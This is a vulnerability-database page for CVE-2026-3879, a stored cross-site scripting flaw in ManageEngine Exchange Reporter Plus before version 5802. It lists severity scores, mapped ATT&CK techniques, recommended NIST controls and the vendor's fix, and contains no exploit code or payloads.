Cyber Posture

CVE-2026-3879

High

Published: 03 April 2026

Published
03 April 2026
Modified
03 April 2026
KEV Added
Patch
CVSS Score 7.3 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
EPSS Score 0.0002 6.5th percentile
Risk Priority 15 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-3879 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Zohocorp Manageengine Exchange Reporter Plus. Its CVSS base score is 7.3 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185); ranked at the 6.5th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Threat & Defense at a Glance

What attackers do: exploitation maps to Browser Session Hijacking (T1185) and 2 other techniques. What defenders deploy: see the NIST 800-53 controls recommended below.
Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-10 Information Input Validation good match
prevent

Information Input Validation directly prevents the injection of malicious scripts into the Equipment Mailbox Details report by enforcing sanitization and validation of user inputs.

SI-15 Information Output Filtering good match
prevent

Information Output Filtering prevents execution of stored malicious scripts by encoding or filtering outputs when rendering the vulnerable report in users' browsers.

SI-2 Flaw Remediation good match
prevent

Flaw Remediation ensures timely application of the vendor patch to version 5802 or later, eliminating the stored XSS vulnerability.

MITRE ATT&CK Enterprise TechniquesAI

T1185 Browser Session Hijacking Collection
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
attack.mitre.org →
T1539 Steal Web Session Cookie Credential Access
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
attack.mitre.org →
T1550.004 Web Session Cookie Lateral Movement
Adversaries can use stolen session cookies to authenticate to web applications and services.
attack.mitre.org →
Why these techniques?

Stored XSS enables browser session hijacking (T1185) via malicious script execution, directly facilitating theft of web session cookies (T1539) and their use for unauthorized actions (T1550.004) as described in the impacts.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

Zohocorp ManageEngine Exchange Reporter Plus versions before 5802 are vulnerable to Stored XSS in Equipment Mailbox Details report.

Deeper analysisAI

CVE-2026-3879 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting Zohocorp ManageEngine Exchange Reporter Plus versions before 5802. The flaw resides in the Equipment Mailbox Details report, where malicious scripts can be persistently injected and stored. Published on 2026-04-03, it carries a CVSS v3.1 base score of 7.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N), reflecting high severity primarily due to impacts on confidentiality and integrity.

Exploitation requires an attacker to possess low privileges (PR:L) and occurs over the network (AV:N) with low attack complexity (AC:L), though it demands user interaction (UI:R) from a targeted user, such as a privileged administrator viewing the report. Successful exploitation allows the injected script to execute in the victim's browser context, enabling high confidentiality (C:H) and integrity (I:H) impacts, such as stealing sensitive data, session tokens, or performing unauthorized actions on behalf of the victim, with no availability disruption (A:N).

ManageEngine has issued an advisory providing further details on the vulnerability at https://www.manageengine.com/products/exchange-reports/advisory/CVE-2026-3879.html. Mitigation centers on upgrading to version 5802 or later, as earlier versions remain vulnerable.

Details

CWE(s)
CWE-79

Affected Products

zohocorp
manageengine exchange reporter plus
5.8 · ≤ 5.8

CVEs Like This One

CVE-2026-28754Same product: Zohocorp Manageengine Exchange Reporter Plus
CVE-2026-4108Same product: Zohocorp Manageengine Exchange Reporter Plus
CVE-2026-28703Same product: Zohocorp Manageengine Exchange Reporter Plus
CVE-2026-27655Same product: Zohocorp Manageengine Exchange Reporter Plus
CVE-2026-28756Same product: Zohocorp Manageengine Exchange Reporter Plus
CVE-2026-4107Same product: Zohocorp Manageengine Exchange Reporter Plus
CVE-2026-3880Same product: Zohocorp Manageengine Exchange Reporter Plus
CVE-2025-1723Same product class: network monitoring / SIEM
CVE-2026-28298Same product class: network monitoring / SIEM
CVE-2025-11669Same product class: network monitoring / SIEM

References